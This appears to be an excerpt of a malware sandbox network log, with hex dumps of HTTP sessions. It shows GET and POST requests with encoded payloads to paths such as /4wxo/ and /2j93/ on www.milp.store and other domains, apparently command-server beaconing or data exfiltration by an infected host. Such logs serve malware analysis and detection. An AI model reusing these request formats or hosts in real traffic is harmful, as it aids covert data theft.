                                                                                        Data Raw: 37 63 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a
                                                                                        Data Ascii: 7c9a<!DOCTYPE html><html lang="en-US" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /><link rel="profile" href="http:
                                                                                        Dec 12, 2024 21:57:48.567579031 CET1289INData Raw: 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 62 75 6c 6b 73 65 73 2e 73 68 6f 70 2f 78 6d 6c 72 70 63
                                                                                        Data Ascii: //gmpg.org/xfn/11" /><link rel="pingback" href="http://www.inbulkses.shop/xmlrpc.php" /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... Search Engine Optimization by Rank Math -
                                                                                        Dec 12, 2024 21:57:48.567845106 CET1289INData Raw: 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 2f 52 61 6e 6b 20 4d 61 74 68 20 57 6f 72 64 50 72 65 73 73 20 53 45 4f 20 70 6c 75 67 69 6e 20 2d 2d 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f
                                                                                        Data Ascii: cript>... /Rank Math WordPress SEO plugin --><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Inbulks &raquo; Feed" href="http://www.inbulkses.shop/feed/" /><link rel="alter
                                                                                        Dec 12, 2024 21:57:48.567935944 CET1289INData Raw: 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a
                                                                                        Data Ascii: .org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.inbulkses.shop\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){tr
                                                                                        Dec 12, 2024 21:57:48.567980051 CET1289INData Raw: 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 3f 6e 65 77 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e
                                                                                        Data Ascii: orkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.creat
                                                                                        Dec 12, 2024 21:57:48.568084002 CET1289INData Raw: 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 3d 3d 74 26 26 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69
                                                                                        Data Ascii: s.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.re
                                                                                        Dec 12, 2024 21:57:48.568094969 CET1289INData Raw: 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 62 75 6c 6b 73 65 73 2e 73 68 6f 70 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 64 69 73 74 2f
                                                                                        Data Ascii: t' id='wp-block-library-css' href='http://www.inbulkses.shop/wp-includes/css/dist/block-library/style.min.css?ver=6.7.1' type='text/css' media='all' /><style id='rank-math-toc-block-style-inline-css' type='text/css'>.wp-block-rank-math-toc-b
                                                                                        Dec 12, 2024 21:57:48.568126917 CET1289INData Raw: 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20
                                                                                        Data Ascii: wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--pr
                                                                                        Dec 12, 2024 21:57:48.568169117 CET1289INData Raw: 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64
                                                                                        Data Ascii: gb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 5
                                                                                        Dec 12, 2024 21:57:48.568254948 CET1289INData Raw: 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d
                                                                                        Data Ascii: d: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-lay
                                                                                        Dec 12, 2024 21:57:48.568422079 CET1289INData Raw: 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e
                                                                                        Data Ascii: tant;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vi


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        57192.168.11.204977285.159.66.9380
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:57:57.134584904 CET392OUTGET /4wxo/?Hsa=KVXAK1dJ22EyzD&Sb=AuCk/wTI7zW3ld/u5VGEHIK6Kt0n3LR9prPfFK+Yc5xTqeXBXJi84rbX4QtnNLSqr4pLPSODfOM24Q7oPb8nuPFT6GxcogJfnF2+8lDPhEW1adutoQ/De7w= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.tabyscooterrentals.xyz
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:57:57.389105082 CET225INHTTP/1.1 404 Not Found
                                                                                        Server: nginx/1.14.1
                                                                                        Date: Thu, 12 Dec 2024 20:57:57 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close
                                                                                        X-Rate-Limit-Limit: 5s
                                                                                        X-Rate-Limit-Remaining: 19
                                                                                        X-Rate-Limit-Reset: 2024-12-12T20:58:02.2635220Z


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        58192.168.11.2049773194.9.94.8680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:10.800822973 CET638OUTPOST /2j93/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        Origin: http://www.milp.store
                                                                                        Referer: http://www.milp.store/2j93/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 59 78 32 2f 30 66 79 67 66 46 46 65 67 54 64 74 63 62 71 2f 6d 55 78 65 4e 47 31 35 56 59 67 32 65 51 4f 39 2b 69 6b 43 50 56 55 6a 56 76 4e 68 34 71 2f 77 67 4d 54 74 36 77 32 73 72 49 71 55 6c 2f 69 63 4f 5a 56 59 4a 35 33 6b 70 64 51 50 55 2b 65 75 31 57 61 62 6d 4f 79 53 65 6a 69 4a 4a 59 2f 35 32 38 47 78 67 4e 52 69 51 4f 4e 32 38 52 31 54 38 57 71 66 31 56 33 65 2b 38 74 31 4b 4e 72 66 4b 43 47 52 30 51 35 43 45 4b 61 52 4a 67 75 43 31 68 36 78 46 59 44 45 54 31 4c 42 76 76 53 76 36 54 45 6c 51 58 46 6d 77 34 30 71 70 31 72 7a 65 4a 6c 73 74 50 4e 6d 6e 34 32 37 69 41 3d 3d
                                                                                        Data Ascii: Sb=Yx2/0fygfFFegTdtcbq/mUxeNG15VYg2eQO9+ikCPVUjVvNh4q/wgMTt6w2srIqUl/icOZVYJ53kpdQPU+eu1WabmOySejiJJY/528GxgNRiQON28R1T8Wqf1V3e+8t1KNrfKCGR0Q5CEKaRJguC1h6xFYDET1LBvvSv6TElQXFmw40qp1rzeJlstPNmn427iA==
                                                                                        Dec 12, 2024 21:58:11.029601097 CET1289INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:58:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29
                                                                                        Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        Dec 12, 2024 21:58:11.029614925 CET1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                        Dec 12, 2024 21:58:11.029814005 CET1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        Dec 12, 2024 21:58:11.029827118 CET1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        Dec 12, 2024 21:58:11.030066013 CET661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        Dec 12, 2024 21:58:11.030076027 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        59192.168.11.2049774194.9.94.8680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:13.557180882 CET658OUTPOST /2j93/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        Origin: http://www.milp.store
                                                                                        Referer: http://www.milp.store/2j93/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 59 78 32 2f 30 66 79 67 66 46 46 65 6d 78 4a 74 51 59 43 2f 75 55 78 5a 52 57 31 35 62 34 67 79 65 51 79 39 2b 6a 51 53 50 6d 38 6a 62 75 39 68 35 72 2f 77 68 4d 54 74 31 51 32 70 6d 6f 71 44 6c 2f 75 55 4f 63 74 59 4a 35 6a 6b 70 5a 63 50 55 4a 4b 74 30 47 61 5a 67 4f 79 55 41 54 69 4a 4a 59 2f 35 32 38 44 35 67 4d 31 69 51 65 39 32 38 31 70 55 39 57 71 63 6c 6c 33 65 76 4d 74 78 4b 4e 72 70 4b 44 61 72 30 54 52 43 45 4f 4b 52 49 79 4b 46 76 78 36 7a 42 59 43 59 65 55 69 47 68 4f 43 75 31 55 6b 6d 66 69 46 52 31 75 35 77 30 48 66 58 64 61 35 65 70 2f 30 4f 6c 36 33 67 2f 42 48 45 48 32 72 74 4d 32 61 71 57 72 6e 34 46 58 6c 56 4f 6e 41 3d
                                                                                        Data Ascii: Sb=Yx2/0fygfFFemxJtQYC/uUxZRW15b4gyeQy9+jQSPm8jbu9h5r/whMTt1Q2pmoqDl/uUOctYJ5jkpZcPUJKt0GaZgOyUATiJJY/528D5gM1iQe9281pU9Wqcll3evMtxKNrpKDar0TRCEOKRIyKFvx6zBYCYeUiGhOCu1UkmfiFR1u5w0HfXda5ep/0Ol63g/BHEH2rtM2aqWrn4FXlVOnA=
                                                                                        Dec 12, 2024 21:58:13.791414022 CET1289INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 12 Dec 2024 20:58:13 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.29
                                                                                        Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        Dec 12, 2024 21:58:13.791503906 CET1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                        Dec 12, 2024 21:58:13.791517019 CET1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        Dec 12, 2024 21:58:13.791723013 CET1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        Dec 12, 2024 21:58:13.791733980 CET661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        Dec 12, 2024 21:58:13.791742086 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        60192.168.11.2049775194.9.94.8680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:58:16.314723015 CET1289OUTPOST /2j93/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.milp.store
                                                                                        Origin: http://www.milp.store
                                                                                        Referer: http://www.milp.store/2j93/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 59 78 32 2f 30 66 79 67 66 46 46 65 6d 78 4a 74 51 59 43 2f 75 55 78 5a 52 57 31 35 62 34 67 79 65 51 79 39 2b 6a 51 53 50 6d 6b 6a 62 63 31 68 34 4d 54 77 69 4d 54 74 38 77 32 6f 6d 6f 71 65 6c 2f 6d 59 4f 64 52 49 4a 36 62 6b 6f 38 41 50 57 38 6d 74 2b 47 61 5a 74 75 79 52 65 6a 69 6d 4a 62 58 6c 32 38 54 35 67 4d 31 69 51 63 6c 32 37 68 31 55 77 32 71 66 31 56 33 43 2b 38 74 5a 4b 4e 7a 35 4b 44 65 37 30 6a 78 43 45 75 61 52 4f 41 53 46 33 68 36 31 4d 34 43 51 65 55 2b 4a 68 4f 65 31 31 55 34 4d 66 6c 35 52 33 59 30 70 70 56 76 4d 50 4b 46 69 75 75 38 72 6b 35 6a 4d 36 79 66 2f 45 6c 37 7a 4c 51 53 68 65 64 6a 51 5a 56 5a 34 55 77 5a 56 4a 50 4b 53 6f 46 39 65 45 79 78 51 4f 37 4f 66 70 76 77 4b 61 30 43 71 69 58 36 53 52 79 61 34 66 6e 42 70 44 6e 58 52 39 46 6b 2b 2b 32 4a 6c 62 56 73 4c 59 69 4b 6b 37 2f 54 52 44 76 69 6c 5a 76 49 61 6c 75 70 72 6b 67 73 2b 6e 73 2b 31 32 4d 57 47 76 71 32 67 76 71 69 63 59 30 41 37 39 50 38 48 50 44 57 30 55 6a 74 6c 73 45 57 56 62 61 44 63 6c 6e 75 [TRUNCATED]
